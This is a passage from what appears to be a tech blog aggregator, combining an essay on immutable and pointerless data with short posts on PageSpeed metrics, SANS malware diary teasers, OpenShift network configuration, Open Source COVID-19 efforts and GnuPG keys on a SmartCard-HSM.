But there's a perfect parallel, and that's the pre-digital office. Back then, most information was kept on paper that was written, typed or printed. If a document had to be updated, it had to be amended or redone from scratch. Aside from very minor annotations or in-place corrections, changes were not possible. When you did redo a document, the old copy was either archived, or thrown away.

data sharing - copy on write

The perfectly mutable medium of computer memory is a blip, geologically speaking. It's easy to think it only has upsides, because it lets us recover freely from mistakes. Or so we think. But the same needs that gave us real life bureaucracy re-appear in digital form. Only it's much harder to re-introduce what came naturally offline.

Instead of thinking of mutable data as the default, I prefer to think of it as data that destroys its own paper trail. It shreds any evidence of the change and adjusts the scene of the crime so the past never happened. All edits are applied atomically, with zero allowances for delay, consideration, error or ambiguity. This transactional view of interacting with data is certainly appealing to systems administrators and high-performance fetishists, but it is a poor match for how people work with data in real life. We enter and update it incrementally, make adjustments and mistakes, and need to keep the drafts safe too. We need to sync between devices and across a night of sleep.

banksy self-shredding painting

Girl With Balloon aka The Self-shredding Painting (Banksy)

Storing your main project in a bunch of silicon that loses its state as soon as you turn off the power is inadvisable. This is why we have automated backups. Apple's Time Machine for instance turns your computer into a semi-immutable data store on a human time scale, garbage collected behind the scenes and after the fact. Past revisions of files are retained for as long is practical, provided the app supports revision control. It even works without the backup drive actually hooked up, as it maintains a local cache of the most recent edits as space permits.

It's a significant feat of engineering, supported by a clever reinterpretation of what "free disk space" actually means. It allows you to Think Different™ about how data works on your computer. It doesn't just give you the peace of mind of short-term OS-wide undo. It means you can still go fish a crumpled piece of data out of the trash long after throwing banana peels and coke cans on top. And you can do it inline, inside the app you're using, using a UI that is only slightly over the top for what it does.

That is what immutable data gets you as an end-user, and it's the result of deciding not to mutate everything in place as if empty disk space is a precious commodity. The benefits can be enormous, for example that synchronization problems get turned into fetching problems. This is called a Git.

It's so good most developers would riot if they were forced to work without it, but almost none grant their own creations the same abilities.

Linus Torvalds

Git repositories are of course notorious for only growing bigger, never shrinking, but that is a long-standing bug if we're really honest. It seems pretty utopian to want a seamless universe of data, perfectly normalized by key in perpetuity, whether mutable or immutable. Falsehoods programmers believe about X is never wrong on a long enough time-scale, and you will need affordances to cushion that inevitable blow sooner or later.

One of those falsehoods is that when you link a piece of data from somewhere else, you always wish to keep that link live instead of snapshotting it, better known as Database Normalization. Given that screenshots of screenshots are now the most common type of picture on the web, aside from cats, we all know that's a lie. Old bills don't actually self-update after you move house. In fact if you squint hard "Print to PDF" looks a lot like compiling source code into a binary for normies, used for much the same reasons.

The analogy to a piece of paper is poignant to me, because you certainly feel it when you try to actually live off SaaS software meant to replicate business processes. Working with spreadsheets and PDFs on my own desktop is easier and faster than trying to use an average business solution designed for that purpose in the current year. Because they built a tool for what they thought people do, instead of what we actually do.

These apps often have immutability, but they use it wrong: they prevent you from changing something as a matter of policy, letting workflow concerns take precedence over an executive override. If e.g. law requires a paper trail, past versions can be archived. But they should let you continue to edit as much as you damn well want, saving in the background if appropriate. The exceptions that get this right can probably be counted on one hand.

Business processes are meant to enable business, not constrain it. Requiring that you only ever have one version of everything at any time does exactly that. Immutability with history is often a better solution, though not a miracle cure. Doing it well requires expert skill in drawing boundaries between your immutable blobs. It also creates a garbage problem and it won't be as fast as mutable in the short term. But in the long term it just might save someone a rewrite. It's rarely pretty when real world constraints collide with an ivory tower that had too many false assumptions baked into it.

Rolls containing Acts of Parliament in the Parliamentary Archives at Victoria Tower, Palace of Westminster

Parliamentary Archives at Victoria Tower – Palace of Westminster

Pointerless Data

Data structures in a systems language like C will usually refer to each other using memory pointers: these are raw 64-bit addresses pointing into the local machine's memory, obscured by virtualization. They reference memory pages that are allocated, with their specific numeric value meaningless and unpredictable.

This has a curious consequence: the most common form of working with data on a computer is one of the least useful encodings of that data imaginable. It cannot be used as-is on any other machine, or even the same machine later, unless loaded at exactly the same memory offset in the exact same environment.

Almost anything else, even in an obscure format, would have more general utility. Serializing and deserializing binary data is hence a major thing, which includes having to "fix" all the pointers, a problem that has generated at least 573 kiloyaks worth of shaving. This is strange because the solution is literally just adding or subtracting a number from a bunch of other numbers over and over.

Okay that's a lie. But what's true is that every pointer p in a linked data structure is really a base + i, with a base address that was determined once and won't change. Using pointers in your data structure means you sprinkle base + invisibly around your code and your data. You bake this value into countless repeated memory cells, which you then have to subtract later if you want to use their contents for outside purposes.

Due to dynamic memory allocation the base can vary for different parts of your linked data structure. You have to assume it's different per pointer, and manually collate and defragment all the individual parts to serialize something.

Pointers are popular because they are easy, they let you forget where exactly in memory your data sits. This is also their downside: not only have you encoded your data in the least repeatable form possible, but you put it where you don't have permission to search through all of it, add to it, or reorganize it. malloc doesn't set you free, it binds you.

But that's a design choice. If you work inside one contiguous memory space, you can replace pointers with just the relative offset i. The resulting data can be snapshotted as a whole and written to disk. In addition to pointerless, certain data structures can even be made offsetless.

For example, a flattened binary tree where the index of a node in a list determines its position in the tree, row by row. Children are found at 2*i and 2*i + 1. This can be e.g. used on GPUs and allows for very efficient traversal and updates. It's also CPU-cache friendly. This doesn't work well for arbitrary graphs, but is still a useful trick to have in your toolbox. In specific settings, pointerless or offsetless data structures can have significant benefits. The fact that it lets you treat data like data again, and just cargo it around wholesale without concern about the minutiae, enables a bunch of other options around it.

Binary Tree - Flattened

It's not a silver bullet because going pointerless can just shift the problem around in the real world. Your relative offsets can still have the same issue as before, because your actual problem was wrangling the data-graph itself. That is, all the bookkeeping of dependent changes when you edit, delete or reallocate. Unless you can tolerate arbitrary memory fragmentation and bloating, it's going to be a big hassle to make it all work well.

Something else is going on beyond just pointers. See, most data structures aren't really data structures at all. They're acceleration structures for data. They accelerate storage, querying and manipulation of data that was already shaped in a certain way.

The contents of a linked list are the same as that of a linear array, and they serialize to the exact same result. A linked list is just an array that has been atomized, tagged and sprayed across an undefined memory space when it was built or loaded.

Because of performance, we tend to use our acceleration structures as a stand-in for the original data, and manipulate that. But it's important to realize this is programmer lazyness: it's only justified if all the code that needs to use that data has the same needs. For example, if one piece of code does insertions, but another needs random access, then neither an array nor linked list would win, and you need something else.

We can try to come up with ever-cleverer data structures to accommodate every imaginable use, and this is called a Postgres. It leads to a ritual called a Schema Design Meeting where a group of people with differently shaped pegs decide what shape the hole should be. Often you end up with a too-generic model that doesn't hold anything particularly well. All you needed was 1 linked list and 1 array containing the exact same data, and a function to convert one to the other, that you use maybe once or twice.

When a developer is having trouble maintaining consistency while coding data manipulations, that's usually because they're actually trying to update something that is both a source of truth and output derived from it, at the same time in the same place. Most of the time this is entirely avoidable. When you do need to do it, it is important to be aware that's what that is.

My advice is to not look for the perfect data structure which kills all birds with one stone, because this is called a Lisp and few people use it. Rather, accept the true meaning of diversity in software: you will have to wrangle different and incompatible approaches, transforming your data depending on context. You will need to rely on well-constructed adaptors that exist to allow one part to forget about most of the rest of the universe. It is best to become good at this and embrace it where you can.

As for handing your data to others, there is already a solution for that. They're called file formats, and they're a thing we used to have. Software used to be able to read many of them, and you could just combine any two tools that had the same ones. Without having to pay a subscription fee for the privilege, or use a bespoke one-time-use convertor. Obviously this was crazy.

These days we prefer to link our data and code using URLs, which is much better because web pages can change invisibly underneath you without any warning. You also can't get the old version back even if you liked it more or really needed it, because browsers have chronic amnesia. Unfortunately it upsets publishers and other copyright holders if anyone tries to change that, so we don't try.

squeak / smalltalk


Suspend and Resume

When you do have snapshottable data structures that can be copied in and out of memory wholesale, it leads to another question: can entire programs be made to work this way? Could they be suspended and resumed mid-operation, even transplanted or copied to another machine? Imagine if instead of a screenshot, a tester could send a process snapshot that can actually be resumed and inspected by a developer. Why did it ever only 'work on my machine'?

Obviously virtual machines exist, and so does wholesale-VM debugging. But on the process level, it's generally a non-starter, because sockets and files and drivers mess it up. External resources won't be tracked while suspended and will likely end up in an invalid state on resume. VMs have well-defined boundaries and well-defined hardware to emulate, whereas operating systems are a complete wild west.

It's worth considering the worth of a paper trail here too. If I suspend a program while a socket is open, and then resume it, what does this actually mean? If it was a one-time request, like an HTTP GET or PUT, I will probably want to retry that request, if at all still relevant. Maybe I prefer to drop it as unimportant and make a newer, different request. If it was an ongoing connection like a WebSocket, I will want to re-establish it. Which is to say, if you told a network layer the reason for opening a socket, maybe it could safely abort and resume sockets for you, subject to one of several policies, and network programming could actually become pleasant.

Files can receive a similar treatment, to deal with the situation where they may have changed, been deleted, moved, etc. Knowing why a file was opened or being written to is required to do this right, and depends on the specific task being accomplished. Here too macOS deserves a shout-out, for being clever enough to realize that if a user moves a file, any application editing that file should switch to the new location as well.

Systems-level programmers tend to orchestrate such things by hand when needed, but the data flow in many cases is quite unidirectional. If a process, or a part of a process, could resume and reconnect with its resources according to prior declared intent, it would make a lot of state machines disappear.

It's not a coincidence this post started with React. Even those aware of it still don't quite realize React is not actually a thing to make web apps. It is an incremental job scheduler, for recursively expanding a tree in an asynchronous and rewindable fashion. It just happens to be built for SGML-like trees, and contains a bunch of legacy fixes for browsers. The pattern can be applied to many areas that are not UI and not web. If it sounds daunting to consider approaching resources this way, consider that people thought exactly the same about async I/O until someone made that pleasant enough.

However, doing this properly will probably require going back further than you think. For example, when you re-establish a socket, should you repeat and confirm the DNS lookup that gave you the IP in the first place? Maybe the user moved locations between suspending and resuming, so you want to reconnect to the nearest data center. Maybe there is no longer a need for the socket because the user went offline.

All of this is contextual, defined by policies informed by the real world. This class of software behavior is properly called etiquette. Like its real world counterpart it is extremely messy because it involves anticipating needs. Usually we only get it approximately right through a series of ad-hoc hacks to patch the worst annoyances. But it is eminently felt when you get such edge cases to work in a generic and reproducible fashion.

Mainly it requires treating policies as first class citizens in your designs and code. This can also lead you to perceive types in code in a different way. A common view is that a type constrains any code that refers to it. That is, types ensure your code only applies valid operations on the represented values. When types represent policies though, the perspective changes because such a type's purpose is not to constrain the code using it. Rather, it provides specific guarantees about the rules of the universe in which that code will be run.

This to me is the key to developer happiness. As opposed to, say, making tools to automate the refactoring of terrible code and make it bearable, but only just.

The key to end-user happiness is to make tools that enable an equivalent level of affordance and flexibility compared to what the developer needed while developing it.

* * *

When you look at code from a data-centric view, a lot of things start to look like stale or inconsistent data problems. I don't like using the word "cache" for this because it focuses on the negative, the absence of fresh input. The real issue is data dependencies, which are connections that must be maintained in order to present a cohesive view and cohesive behavior, derived from a changing input model. Which is still the most practical way of using a computer.

Most caching strategies, including 99% of those in HTTP, are entirely wrong. They fall into the give-up-and-pray category, where they assume the problem is intractable and don't try something that could actually work in all cases. Which, stating the obvious, is what you should actually aim for.

Often the real problem is that the architect's view of the problem is a tangled mess of boxes and arrows that point all over the place, with loopbacks and reversals, which makes it near-impossible to anticipate and cover all the applicable scenarios.

If there is one major thread running through this, it's that many currently accepted sane defaults really shouldn't be. In a world of terabyte laptops and gigabyte GPUs they look suspiciously like premature optimization. Many common assumptions deserve to be re-examined, at least if we want to adapt tools like from the Offline Age to a networked day. We really don't need a glossier version of a Microsoft Office 95 wizard with a less useful file system.

We do need optimized code in our critical paths, but developer time is worth more than CPU time most everywhere else. Most of all, we need the ambition to build complete tools and the humility to grant our users access on an equal footing, instead of hoarding the goods.

The argument against these practices is usually that they lead to bloat and inefficiency. Which is definitely true. Yet even though our industry has not adopted them much at all, the software already comes out orders of magnitude bigger and slower than before. Would it really be worse?

If you tested your blog’s performance on Google PageSpeed Insights yesterday and do so again today, you might be in for a surprise with a lower score even if not one byte (letter) got changed on your site. The reason: Google updated PageSpeed Insights to Lighthouse 6, which changes the KPI’s (the lab data metrics) that are reported, adds new opportunities and recommendations and changes the way the total score is calculated.

So all starts with the changed KPI’s in the lab metrics really; whereas up until yesterday First Contentful Paint, Speed Index, Time to Interactive, First Meaningful Paint, First CPU Idle and First input delay were measured, the last 3 ones are now not shown any more, having been replaced by:

  • Largest Contentful Paint marks the point when the page’s main content has likely loaded, this can generally be improved upon by removing removing render-blocking resources (JS/ CSS), optimizing images, …
  • Total Blocking Time quantifies how non-interactive a page while loading, this is mainly impacted by Javascript (local and 3rd party) blocking the main thread, so improving that generally means ensuring there is less JS to execute
  • Cumulative Layout Shift which measures unexpected layout shifts

The total score is calculated based on all 6 metrics, but the weight of the 3 “old” ones (FCP, SI, TTI) is significantly lowered (from 80 to 45%) and the new LCP & TBT account for a whopping 50% of your score (CLS is only 5%).

Lastly some one very interesting opportunity and two recommendations I noticed;

  • GPSI already listed unused CSS, but now adds unused JS to that list, which will prove to be equally hard to control in WordPress as JS like CSS is added by almost each and every plugin. Obviously if you’re using Autoptimize this will flag the Autoptimized JS, disalbe Autoptimize for the test by adding ?ao_noptimize=1 to the URL to see what original JS is unused.
  • GPSI now warns about using document.write and about the impact of passive listeners on scrolling performance which can lead to Google complaining about … Google :-)

Summary: Google Pagespeed Insights changed a lot and it forces performance-aware users to stay on their toes. Especially sites with lots of (3rd party) JavaScript might want to reconsider some of the tools used.

I published the following diary on “Flashback on CVE-2019-19781“:

First of all, did you know that the Flame malware turned 8 years today! Happy Birthday! This famous malware discovered was announced on May 28th, 2012. The malware was used for targeted cyber espionage activities in the Middle East area. If this malware was probably developed by a nation-state organization. It infected a limited amount of hosts (~1000 computers) making it a targeted attack… [Read more]

[The post [SANS ISC] Flashback on CVE-2019-19781 has been first published on /dev/random]

May 25, 2020

I recently learned that quite a few (old) root certificates are going to expire, and many websites still send those along in the TLS handshake.

May 23, 2020

I published the following diary on “AgentTesla Delivered via a Malicious PowerPoint Add-In“:

Attackers are always trying to find new ways to deliver malicious code to their victims. Microsoft Word and Excel are documents that can be easily weaponized by adding malicious VBA macros. Today, they are one of the most common techniques to compromise a computer. Especially because Microsoft implemented automatically executed macros when the document is opened. In Word, the macro must be named AutoOpen(). In Excel, the name must be Workbook_Open(). However, PowerPoint does not support this kind of macro. Really? Not in the same way as Word and Excel do… [Read more]

[The post [SANS ISC] AgentTesla Delivered via a Malicious PowerPoint Add-In has been first published on /dev/random]

May 21, 2020

I published the following diary on “Malware Triage with FLOSS: API Calls Based Behavior“:

Malware triage is a key component of your hunting process. When you collect suspicious files from multiple sources, you need a tool to automatically process them to extract useful information. To achieve this task, I’m using FAME which means “FAME Automates Malware Evaluation”. This framework is very nice due to the architecture based on plugins that you can enable upon your needs. Here is an overview of my configuration… [Read more]

[The post [SANS ISC] Malware Triage with FLOSS: API Calls Based Behavior has been first published on /dev/random]

May 19, 2020

Recently I had to work with one of my colleagues (David) on something that was new to me : Openshift. I never really looked at OpenShift but knew the basic concepts, at least on OKD 3.x.

With 4.x, OCP is completely different as instead of deploying "normal" Linux distro (like CentOS in our case), it's now using RHCOS (so CoreOS) as it's foundation. The goal of this blog post is not to dive into all the technical steps required to deploy/bootstrap the openshift cluster, but to discuss of one particular 'issue' that I found myself annoying while deploying: how to disable dhcp on the CoreOS provisioned nodes.

To cut a long story short, you can read the basic steps needed to deploy Openshift on bare-metal in the official doc

Have you read it ? Good, now we can move forward :)

After we had configured our install-config.yaml (with our needed values) and also generated the manifests with openshift-install create manifests --dir=/path/ we thought that it would be just deploying with the ignition files built by the openshift-install create ignition-configs --dir=/path step (see in the above doc for all details)

It's true that we ended up with some ignition files like:

  • bootstrap.ign
  • worker.ign
  • master.ign

Those ignition files are (more or less) like traditional kickstart files to let you automate the RHCOS deploy on bare-metal. The other part is really easy, as it's a matter (with ansible in our case) to just configure the tftp boot argument, and call an ad-hoc task to remotely force a physical reinstall of the machine (through ipmi):

So we kicked off first the bootstrap node (ephemeral node being used as a temporary master, from which the real master forming the etcd cluster will get their initial config from), but then we realized that, while RHCOS was installed and responding with the fixed IP we set through pxeboot kernel parameters (and correctly applied on the reboot), each RHCOS node was also trying by default to activate all present NICs on the machine.

That was suddenly "interesting" as we don't fully control the network where those machines are, and each physical node has 4 NICs, all in the same vlan , in which we have also a small dhcp range for other deployments. Do you see the problem about etcd and members in the same subnet and multiple IP addresses ? yeah, it wasn't working as we saw some requests coming from the dhcp interfaces instead of the first properly configured NIC in each system.

The "good" thing is that you can still ssh into each deployed RHCOS (even if not adviced to) , to troubleshoot this. We discovered that RHCOS still uses NetworkManager but that default settings would be to enable all NICs with DHCP if nothing else declared which is what we need to disable.

After some research and help from Colin Walters, we were pointed to this bug report for coreos

With the traditional "CentOS Linux" sysadmin mindset, I thought : "good, we can just automate with ansible ssh'ing into each provisioned rhcos to just disable it", but there should be a clever other way to deal with this, as it was also impacting our initial bootstrap and master nodes (so no way to get cluster up)

That's then that we found this : Customing deployment with Day0 config : here is a simple example for Chrony

That's how I understood the concept of MachineConfig and how that's then supposed to work for a provisioned cluster, but also for the bootstrap process. Let's so use those informations to create what we need and start a fresh deploy.

Assuming that we want to create our manifest in :

openshift-install create manifests --dir=/<path>/

And now that we have manifests, let's inject our machine configs : You'll see that because it's YAML all over the place, injecting Yaml in Yaml would be "interesting" so the concept here is to inject content as base64 encoded string, everywhere.

Let's suppose that we want the /etc/NetworkManager.conf.d/disabledhcp.conf having this content on each provisioned node (master and worker) to tell NetworkManager to not default to auto/dhcp:


Let's first encode it to base64:

cat << EOF | base64

Our base64 value is W21haW5dCm5vLWF1dG8tZGVmYXVsdD0qCg==

So now that we have content, let's create manifests to create automatically that file at provisioning time :

pushd <path>
# To ensure that provisioned master will try to become master as soon as they are installed
sed -i 's/mastersSchedulable: true/mastersSchedulable: false/g' manifests/cluster-scheduler-02-config.yml

pushd openshift
for variant in master worker; do 
cat << EOF > ./99_openshift-machineconfig_99-${variant}-nm-nodhcp.yaml
kind: MachineConfig
  labels: ${variant}
  name: nm-${variant}-nodhcp
      config: {}
        tls: {}
      timeouts: {}
      version: 2.2.0
    networkd: {}
    passwd: {}
      - contents:
          source: data:text/plain;charset=utf-8;base64,W21haW5dCm5vLWF1dG8tZGVmYXVsdD0qCg==
          verification: {}
        filesystem: root
        mode: 0644
        path: /etc/NetworkManager/conf.d/disabledhcp.conf
  osImageURL: ""


I think this snipped is pretty straight-forward, and you see in the source how we "inject" the content of the file itself (previous base64 value we got in previous step)

Now that we have added our customizations, we can just proceed with the openshift-install create ignition-configs --dir=/<path> command again, retrieve our .ign file, and call ansible again to redeploy the nodes, and this time they were deployed correctly with only the IP coming from ansible inventory and no other nic in dhcp.

And also that it works, deploying/adding more workers node in the OCP cluster is just a matter to calling ansible and physical nodes are deployed in a matter of ~5minutes (as RHCOS is just extracting its own archive on disk and reboot)

I don't know if I'll have to take multiple deep dives into OpenShift in the future , but at least I learned multiple things, and yes : you always learn more when you have to deploy something for the first time and that it doesn't work straight away .. so while you try to learn the basics from official doc, you have also to find other resources/docs elsewhere :-)

Hope that it can help people in the same situation when having to deploy OpenShift on premises/bare-metal.

May 15, 2020

As someone who has spent his entire career in Open Source, I've been closely following how Open Source is being used to fight the COVID-19 global pandemic.

I recently moderated a panel discussion on how Open Source is being used with regards to the coronavirus crisis. Our panel included: Jim Webber (Chief Scientist at Neo4J), Ali Ghodsi (CEO at Databricks), Dan Eiref (Senior Director of Product management at Markforged) and Debbie Theobold (CEO at Vecna Robotics). Below are some of the key takeaways from our discussion. They show how Open Source is a force for good in these uncertain times.

Open Source enables knowledge sharing

Providing accurate information related to COVID-19 is an essential public service. Neo4J worked with data scientists and researchers to create CovidGraph. It is an Open Source graph database that brings together information on COVID-19 from different sources.

Jim Webber from Neo4J explained, The power of graph data [distributed via an open source management system] is that it can pull together disparate datasets from medical practitioners, public health officials and other scientific publications into one central view. People can then make connections between all facts. This is useful when looking for future long-term solutions.. CovidGraph helped institutions like the Canadian government integrate data from multiple departments and facilities.

Databricks CEO Ali Ghodsi also spoke to his company's efforts to democratize data and artificial intelligence. Their mission is to help data teams solve the world's toughest problems. Databricks created Glow, an Open Source toolkit built on Apache Spark that enables large-scale genomic analysis. Glow helps scientists understand the development and spread of the COVID-19 virus. Databricks made their datasets available for free. Using Glow's machine learning tools, scientists are creating predictive models that track the spread of COVID-19.

Amid the positive progress we're seeing from this open approach to data, some considerations were raised about governments' responsibilities with the data they collect. Maintaining public trust is always a huge concern. Still, as Ali said, The need for data is paramount. This isn't a matter of using data to sell ads; it's a matter of using data to data to save lives..

Open Source makes resources accessible on a global scale

It's been amazing to watch how Open Source propels innovation in times of great need. Dan Eiref from 3D printer company Markforged spoke to how his company responded to the call to assist in the pandemic. Markforged Open Sourced the design for face masks and nasal swabs. They also partnered with doctors to create a protective face shield and distributed personal protective equipment (PPE) to more than 500 hospitals.

Almost immediately we got demand from more than 10,000 users to replicate this design in their own communities, as well as requests to duplicate the mask on non-Markforged printers. We decided to Open Source the print files so anyone could have access to these protections., said Eiref.

The advantage of Open Source is that it can quickly produce and distribute solutions to people who need it the most. Debbie Theobold, CEO of Vecna Robotics, shared how her company helped tackle the shortage of ventilators. Since COVID-19 began, medical manufacturers have struggled to provide enough ventilators, which can cost upwards of $40,000. Venca Robotics partnered with the Massachusetts Institute of Technology (MIT) to develop an Open Source ventilator design called Ventiv, a low-cost alternative for emergency ventilation. The rapid response from people to come together and offer solutions demonstrates the altruistic pull of the Open Source model to make a difference., said Theobald.

Of course, there are still challenges for Open Source in the medical field. In the United States, all equipment requires FDA certification. The FDA isn't used to Open Source, and Open Source isn't used to dealing with FDA certification either. Fortunately, the FDA has adjusted its process to help make these designs available more quickly.

Open Source accelerates digital transformations

A major question on everyone's mind was how technology will affect our society post-pandemic. It's already clear that long-term trends like online commerce, video conferencing, streaming services, cloud adoption and even Open Source are all being accelerated as a result of COVID-19. Many organizations need to innovate faster in order to survive. Responding to long-term trends by slowly adjusting traditional offerings is often "too little, too late".

For example, Debbie Theobold of Vecna Robotics brought up how healthcare organizations can see greater success by embracing websites and mobile applications. These efforts for better, patient-managed experiences that were going to happen eventually are happening right now. We've launched our mobile app and embraced things like online pre-registration. Companies that were relying on in-person interactions are now struggling to catch up. We've seen that technology-driven interactions are a necessity to keeping patient relationships., she said.

At Acquia, we've known for years that offering great digital experiences is a requirement for organizations looking to stay ahead.

In every crisis, Open Source has empowered organizations to do more with less. It's great to see this play out again. Open Source teams have rallied to help and come up with some pretty incredible solutions when times are tough.


So I got my Xiaomi M365 e-scooter a few months, and it quickly started to show quite some disadvantages. The most annoying was the weak motor : going up some long hills quickly forced me to step off as the e-scooter came to a grinding halt. The autonomy was low which required a daily charging session of 4 hours. Another issue was the bulky form factor which made the transportation on the train a bit cumbersome. And last but not least : an e-scooter still looks like a childs toy. I know I'm a grown-up child, but that doesn't mean I want to shout it out to everyone.

In the mean time, I've encountered some information on monowheels: they are single wheeled devices with pedals on the side. It looks quite daunting to use one, but when I received my Inmotion V10, I was immediately sold. This kind of device is really revolutionary : powerfull motor, great range and looks. It is compact enough to easily take it on the public transport, and has a maximum speed of 40 kph.

It however took me quite a few days to learn to ride this thing : only after a week with a daily exercise session of half an hour, things finally 'clicked' inside my head, and a week later, I found myself confident enough to ride in traffic. So a steep learning curve indeed, but when you persist, the reward is immense : riding this thing feels like you're flying !

I ran into this error when doing a very large MySQL import from a dumpfile.

May 14, 2020

Annoyingly, the date command differs vastly between Linux & BSD systems. Mac, being based on BSD, inherits the BSD version of that date command.

May 11, 2020

Blue hearts

I'm excited to announce that the Drupal Association has reached its 60-day fundraising goal of $500,000. We also reached it in record time; in just over 30 days instead of the planned 60!

It has been really inspiring to see how the community rallied to help. With this behind us, we can look forward to the planned launch of Drupal 9 on June 3rd and our first virtual DrupalCon in July.

I'd like to thank all of the individuals and organizations who contributed to the #DrupalCares fundraising campaign. The Drupal community is stronger than ever! Thank you!

May 10, 2020

In a few hours, the Bitcoin network will experience its third “halving”. So what is it and how does it work under the hood?
In a few hours, the Bitcoin network will experience its third “halving”. So what is it and how does it work under the hood?

May 08, 2020

I published the following diary on “Using Nmap As a Lightweight Vulnerability Scanner“:

Yesterday, Bojan wrote a nice diary about the power of the Nmap scripting language (based on LUA). The well-known port scanner can be extended with plenty of scripts that are launched depending on the detected ports. When I read Bojan’s diary, it reminded me of an old article that I wrote on my blog a long time ago. The idea was to use Nmap as a lightweight vulnerability scanner. Nmap has a scan type that tries to determine the service/version information running behind an open port (enabled with the ‘-sV’ flag). Based on this information, the script looks for interesting CVE in a flat database. Unfortunately, the script was developed by a third-party developer and was never integrated into the official list of scripts… [Read more]

[The post [SANS ISC] Using Nmap As a Lightweight Vulnerability Scanner has been first published on /dev/random]

May 06, 2020

I published the following diary on “Keeping an Eye on Malicious Files Life Time“:

We know that today’s malware campaigns are based on fresh files. Each piece of malware has a unique hash and it makes the detection based on lists of hashes not very useful these days. But can we spot some malicious files coming on stage regularly or, suddenly, just popping up from nowhere… [Read more]

[The post [SANS ISC] Keeping an Eye on Malicious Files Life Time has been first published on /dev/random]

May 05, 2020

These instructions can be followed to create a 2-out-of-3 multisignature address on the EOS blockchain (or any derivative thereof).

May 03, 2020

A quick reminder to myself that the Developer Console in Chrome or Firefix is useful to mass-select a bunch of checkboxes, if the site doesn’t have a “select all”-option (which really, it should).
I had a use case where I wanted to be notified whenever a particular string occured in a log file.

May 02, 2020


When you want to store your GnuPG private key(s) on a smartcard, you have a few options like the Yubikey, NitroKey GPG compatible cards, or the OpenPGP. The advantage of these cards is that they support GnuPG directly. The disadvantage is that they can only store 1 or a few keys.

Another option is SmartCardHSM, NitroKey HSM is based on SmartCardHsm and should be compatible. The newer versions support 4k RSA encryption keys and can store up 19 RSA 4k keys. The older version is limited to 2k RSA keys. I still have the older version. The advantage is that you can store multiple keys on the card. To use it for GPG encryption you’ll need to set up a gpg-agent with gnupg-pkcs11-scd.



I use 3 smartcards to store my keys, these SmartCardHSM’s were created with Device Key Encryption Key (DKEK) keys. See my previous blog posts on how to setup SmartCardHSM with Device Key Encryption Keys:

I create the public / private key pair on an air gaped system running Kal Linux live and copy the key to the other smartcards. See my previous blog posts on how to do this. I’ll only show how to create the keypair in this blog post.

Setup gpg

Create the keypair.

kali@kali:~$ pkcs11-tool --module --keypairgen --key-type rsa:2048 --label gpg.intern.stafnet.local --login
Using slot 0 with a present token (0x0)
Key pair generated:
Private Key Object; RSA 
  label:      gpg.intern.stafnet.local
  ID:         47490caa5589d5b95e2067c5bc49b03711b854da
  Usage:      decrypt, sign, unwrap
  Access:     none
Public Key Object; RSA 2048 bits
  label:      gpg.intern.stafnet.local
  ID:         47490caa5589d5b95e2067c5bc49b03711b854da
  Usage:      encrypt, verify, wrap
  Access:     none

Create and upload the certificate

Create a self signed certificate

Create a self-signed certificate based on the key pair.

$ openssl req -x509 -engine pkcs11 -keyform engine -new -key 47490caa5589d5b95e2067c5bc49b03711b854da -sha256 -out cert.pem -subj "/CN=gpg.intern.stafnet.local"

Convert to DER

The certificate is created in the PEM format, to be able to upload it to the smartcard we need it in the DER format (we’d have created the certificate directly in the DER format with -outform der).

$ openssl x509 -outform der -in cert.pem -out cert.der

Upload the certificate to the smartcard(s)

$ pkcs11-tool --module /usr/lib64/ -l --write-object cert.der --type cert --id 47490caa5589d5b95e2067c5bc49b03711b854da --label "gpg.intern.stafnet.local"
Using slot 0 with a present token (0x0)
Logging in to "UserPIN (SmartCard-HSM)".
Please enter User PIN: 
Created certificate:
Certificate Object; type = X.509 cert
  label:      gpg.intern.stafnet.local
  subject:    DN: CN=gpg.intern.stafnet.local
  ID:         47490caa5589d5b95e2067c5bc49b03711b854da

Setup the gpg-agent

Install the gnupg-pkcs11-scd from GNU/Linux distribution package manager.

Configure gnupg-agent

$ cat ~/.gnupg/gpg-agent.conf
scdaemon-program /usr/bin/gnupg-pkcs11-scd
pinentry-program /usr/bin/pinentry
$ cat ~/.gnupg/gnupg-pkcs11-scd.conf
providers smartcardhsm
provider-smartcardhsm-library /usr/lib64/

Reload the agent

gpg-agent --server gpg-connect-agent << EOF


$ gpg --card-status
Application ID ...: D2760001240111503131171B486F1111
Version ..........: 11.50
Manufacturer .....: unknown
Serial number ....: 171B486F
Name of cardholder: [not set]
Language prefs ...: [not set]
Sex ..............: unspecified
URL of public key : [not set]
Login data .......: [not set]
Signature PIN ....: forced
Key attributes ...: 1R 1R 1R
Max. PIN lengths .: 0 0 0
PIN retry counter : 0 0 0
Signature counter : 0
Signature key ....: [none]
Encryption key....: [none]
Authentication key: [none]
General key info..: [none]

Get the GPG KEY-FRIEDNLY string

gpg-agent --server gpg-connect-agent << EOF
$ gpg-agent --server gpg-connect-agent << EOF
OK Pleased to meet you
gnupg-pkcs11-scd[26682.2406156096]: Listening to socket '/tmp/gnupg-pkcs11-scd.NeQexh/agent.S'
gnupg-pkcs11-scd[26682.2406156096]: accepting connection
gnupg-pkcs11-scd[26682]: chan_0 -> OK PKCS#11 smart-card server for GnuPG ready
gnupg-pkcs11-scd[26682.2406156096]: processing connection
gnupg-pkcs11-scd[26682]: chan_0 <- GETINFO socket_name
gnupg-pkcs11-scd[26682]: chan_0 -> D /tmp/gnupg-pkcs11-scd.NeQexh/agent.S
gnupg-pkcs11-scd[26682]: chan_0 -> OK
gnupg-pkcs11-scd[26682]: chan_0 <- LEARN
gnupg-pkcs11-scd[26682]: chan_0 -> S SERIALNO D2760001240111503131171B486F1111
gnupg-pkcs11-scd[26682]: chan_0 -> S APPTYPE PKCS11
S SERIALNO D2760001240111503131171B486F1111
gnupg-pkcs11-scd[26682]: chan_0 -> S KEY-FRIEDNLY 5780C7B3D0186C21C8C4503DDA7641FC71FD9B54 /CN=gpg.intern.stafnet.local on UserPIN (SmartCard-HSM)
gnupg-pkcs11-scd[26682]: chan_0 -> S CERTINFO 101 www\x2ECardContact\x2Ede/PKCS\x2315\x20emulated/DECM0102330/UserPIN\x20\x28SmartCard\x2DHSM\x29/47490CAA5589D5B95E2067C5BC49B03711B854DA
gnupg-pkcs11-scd[26682]: chan_0 -> S KEYPAIRINFO 5780C7B3D0186C21C8C4503DDA7641FC71FD9B54 www\x2ECardContact\x2Ede/PKCS\x2315\x20emulated/DECM0102330/UserPIN\x20\x28SmartCard\x2DHSM\x29/47490CAA5589D5B95E2067C5BC49B03711B854DA
gnupg-pkcs11-scd[26682]: chan_0 -> OK
